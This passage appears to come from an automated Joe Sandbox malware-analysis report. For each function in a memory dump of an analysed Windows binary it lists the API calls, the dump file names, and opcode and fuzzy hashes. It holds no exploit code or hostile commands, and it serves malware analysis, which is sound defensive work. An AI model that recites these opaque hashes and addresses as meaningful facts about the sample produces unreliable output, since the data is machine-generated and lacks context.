                                                                                                                  • Opcode ID: 12998758faec85e7d7c8d59f3ee5e5c085a0b7c73fcaa648892ba5b96b1db2e7
                                                                                                                  • Instruction ID: 5ea9d9dec3e82a914f4cd6b95c874f6209cbf061ac082d35c50d3711dffb2cc6
                                                                                                                  • Opcode Fuzzy Hash: 12998758faec85e7d7c8d59f3ee5e5c085a0b7c73fcaa648892ba5b96b1db2e7
                                                                                                                  • Instruction Fuzzy Hash: C511E771901328BAD7205B69AC4DFEBBA7CEF45760F10419AF505E72D0D2704E80CBB4
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00DB13EE
                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DB1409
                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DB141F
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00DB1474
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3137044355-0
                                                                                                                  • Opcode ID: ff8f2f1991a59a716cd6b9eb0837c6082050f3a4ee8248bb45fa9d4c4814fd7f
                                                                                                                  • Instruction ID: 707ee1c45e8013bc236f00e4c83bfbf0d88578a9e058415d8cf8a9037002b84e
                                                                                                                  • Opcode Fuzzy Hash: ff8f2f1991a59a716cd6b9eb0837c6082050f3a4ee8248bb45fa9d4c4814fd7f
                                                                                                                  • Instruction Fuzzy Hash: A121AC79A00309EBDB209F90DC98AEBBBB9EF00744F808469E65397150DB70EA04DF70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DAC285
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC297
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC2AD
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC2C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 4bcbb34c30f585f113ba994e1b2e0d415a36661cea268fb87d0b9241160f9088
                                                                                                                  • Instruction ID: 881739ffaa420ce7b7a1203efe03b4cf0f53432870e4fac97bf057a60436b4ed
                                                                                                                  • Opcode Fuzzy Hash: 4bcbb34c30f585f113ba994e1b2e0d415a36661cea268fb87d0b9241160f9088
                                                                                                                  • Instruction Fuzzy Hash: 2B11187A941218FFEB11DBD8C885F9DBBB4FB09710F204091EA04B7294D671AE10DBA4
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DB7C6C
                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00DB7C9F
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DB7CB5
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DB7CBC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2880819207-0
                                                                                                                  • Opcode ID: 91a553bd2906794cf20aa25c69b9a45b031848e7fab6cc23f961c3775ff2e89c
                                                                                                                  • Instruction ID: 1aea809af0c4c5f5fc45f526cc1de9d2aa1f26fb380fd9aee3f9db053d159394
                                                                                                                  • Opcode Fuzzy Hash: 91a553bd2906794cf20aa25c69b9a45b031848e7fab6cc23f961c3775ff2e89c
                                                                                                                  • Instruction Fuzzy Hash: 42118272A04348AFD7129BBD9C08AAA7FAA9B44325F144259F525E3251D6708A1887B1
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3970641297-0
                                                                                                                  • Opcode ID: cb95df69069ac03d80690540511798b2e56b32d3316fddb8a5affbee7b7ce11e
                                                                                                                  • Instruction ID: 8f51c59bccbf2357edbf44f5621f3bd25b48c0b26652d2dbca94d5fa8b1dd2eb
                                                                                                                  • Opcode Fuzzy Hash: cb95df69069ac03d80690540511798b2e56b32d3316fddb8a5affbee7b7ce11e
                                                                                                                  • Instruction Fuzzy Hash: 9511A172511648FFDB115FA19C45EFA7B6EEF08364F095225FA0492120D731DC60DBB0
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB49EE
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A13
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A1D
                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2875609808-0
                                                                                                                  • Opcode ID: cc077c34ef8b881d2a2a4c8212a5b029d5329c3a35f5f3429db4fadd42db1958
                                                                                                                  • Instruction ID: 6f8dff05b0887847115f62dc2ca472261459b7f27c75aa138138cd413b40ee9b
                                                                                                                  • Opcode Fuzzy Hash: cc077c34ef8b881d2a2a4c8212a5b029d5329c3a35f5f3429db4fadd42db1958
                                                                                                                  • Instruction Fuzzy Hash: 99113931D40628DBCF00EFA5DA89AEEBB79FF09715F014059E942B6241CB309660CBB9
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3016257755-0
                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                  • Instruction ID: 3c12e8b769cef602c318e3dc32089c657ba860031403b2146360b1e311736bd4
                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                  • Instruction Fuzzy Hash: BF01403600064EFBCF165F84EC41CEE3F62FB1A350B588915FE1859039D236CAB1ABA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9869D: __getptd_noexit.LIBCMT ref: 00D9869E
                                                                                                                  • __lock.LIBCMT ref: 00D9811F
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00D9813C
                                                                                                                  • _free.LIBCMT ref: 00D9814F
                                                                                                                  • InterlockedIncrement.KERNEL32(017B77B8), ref: 00D98167
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2704283638-0
                                                                                                                  • Opcode ID: 6e7d881de16d8096a701efac5c45a2a5f0c46fd8d1522d660f5be59efccf9f54
                                                                                                                  • Instruction ID: c9810131e3fb7fd75d7007aa68314feed8489f61661ccb98723dc389a40497fc
                                                                                                                  • Opcode Fuzzy Hash: 6e7d881de16d8096a701efac5c45a2a5f0c46fd8d1522d660f5be59efccf9f54
                                                                                                                  • Instruction Fuzzy Hash: BE012D31901722ABCF25AFA5D8067AD7760BF06F11F084119F81477691CF346942EBF2
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00D98768
                                                                                                                    • Part of subcall function 00D98984: __mtinitlocknum.LIBCMT ref: 00D98996
                                                                                                                    • Part of subcall function 00D98984: RtlEnterCriticalSection.NTDLL(00D90127), ref: 00D989AF
                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00D98775
                                                                                                                  • __lock.LIBCMT ref: 00D98789
                                                                                                                  • ___addlocaleref.LIBCMT ref: 00D987A7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1687444384-0
                                                                                                                  • Opcode ID: 695108fb7a96db2b749d6f9d2aef5eb5d001293e0eb8e4036f181f53173cc9dd
                                                                                                                  • Instruction ID: 373c6a62558411fecbe4611090909227fc1e81237b0c44d5d0a079153664c4e8
                                                                                                                  • Opcode Fuzzy Hash: 695108fb7a96db2b749d6f9d2aef5eb5d001293e0eb8e4036f181f53173cc9dd
                                                                                                                  • Instruction Fuzzy Hash: 13012D71411B01AFDB60EFA5D806759B7E0FF40725F20890EE499977A0DB70A644DF21
                                                                                                                  APIs
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DB9C7F
                                                                                                                    • Part of subcall function 00DBAD14: _memset.LIBCMT ref: 00DBAD49
                                                                                                                  • _memmove.LIBCMT ref: 00DB9CA2
                                                                                                                  • _memset.LIBCMT ref: 00DB9CAF
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DB9CBF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 48991266-0
                                                                                                                  • Opcode ID: ae411653fdbedfd9b31329fcfd8a6afdc6c15a923c1610ca1f5a19940b799e38
                                                                                                                  • Instruction ID: 4b94b1c01becd4d864ed8fee89818b7ae42abac96ca181ed56aaf554387cb9c4
                                                                                                                  • Opcode Fuzzy Hash: ae411653fdbedfd9b31329fcfd8a6afdc6c15a923c1610ca1f5a19940b799e38
                                                                                                                  • Instruction Fuzzy Hash: F2F03A7A200100ABCF016F54EC85A9ABB2AEF45320B08C062FE099E227C771E911DBB5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                    • Part of subcall function 00D8B58B: BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DDE860
                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00DDE86D
                                                                                                                  • EndPath.GDI32(00000000), ref: 00DDE87D
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00DDE88B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1539411459-0
                                                                                                                  • Opcode ID: 1279d4663c9a7974ea2f9007eb72728735c9f4851dfbe191a61230775734fd61
                                                                                                                  • Instruction ID: e573c7ad7fca3da3d0be7736b627a99ab111424f3d4b27ac64cd879c12db84e6
                                                                                                                  • Opcode Fuzzy Hash: 1279d4663c9a7974ea2f9007eb72728735c9f4851dfbe191a61230775734fd61
                                                                                                                  • Instruction Fuzzy Hash: 73F0BE31000759BADB162F50AC0DFDE3F9BAF06310F048142FA01642E18B754611DFB9
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DAD640
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAD653
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DAD65A
                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00DAD661
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2710830443-0
                                                                                                                  • Opcode ID: d40ae3ae2fa30aab031031f26ef483177c4b47255778c634099503824e9ed501
                                                                                                                  • Instruction ID: fbf9983b2fcabaec4eee21e2facbdcb6fddda2673e6ff763459c711afa5b09d7
                                                                                                                  • Opcode Fuzzy Hash: d40ae3ae2fa30aab031031f26ef483177c4b47255778c634099503824e9ed501
                                                                                                                  • Instruction Fuzzy Hash: 3AE0397110132CBADB201BA2AC0DFEB7F1EEF167A1F048010B50DC5460CA719580CBB0
                                                                                                                  APIs
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00DABE01
                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DAB9C9), ref: 00DABE08
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DAB9C9), ref: 00DABE15
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DAB9C9), ref: 00DABE1C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974789173-0
                                                                                                                  • Opcode ID: 3aa8ee912e0bb632c58199cad6a5a241f11995d90c20088fd80f28fe34cbb8e1
                                                                                                                  • Instruction ID: b2175b854875a6cae7768e5c539c62022d4d0035a5206cd6b05b8cb29b649505
                                                                                                                  • Opcode Fuzzy Hash: 3aa8ee912e0bb632c58199cad6a5a241f11995d90c20088fd80f28fe34cbb8e1
                                                                                                                  • Instruction Fuzzy Hash: BAE08632641311ABDB201FB19C0CBAB3BEAEF567A2F04C818F341DA150DB348542C771
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000008), ref: 00D8B0C5
                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00D8B0CF
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00D8B0E4
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00D8B0EC
                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00DEECFA
                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DEED07
                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00DEED20
                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00DEED39
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00DEED59
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEED64
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1946975507-0
                                                                                                                  • Opcode ID: fc4c6415c31d8e83c843a10806046a0d4a0ad192214c24ee8f17f88234247d68
                                                                                                                  • Instruction ID: 58251981df06d1a532ae1d7fba6140683c9da538a592e6382f6e23121b3b4098
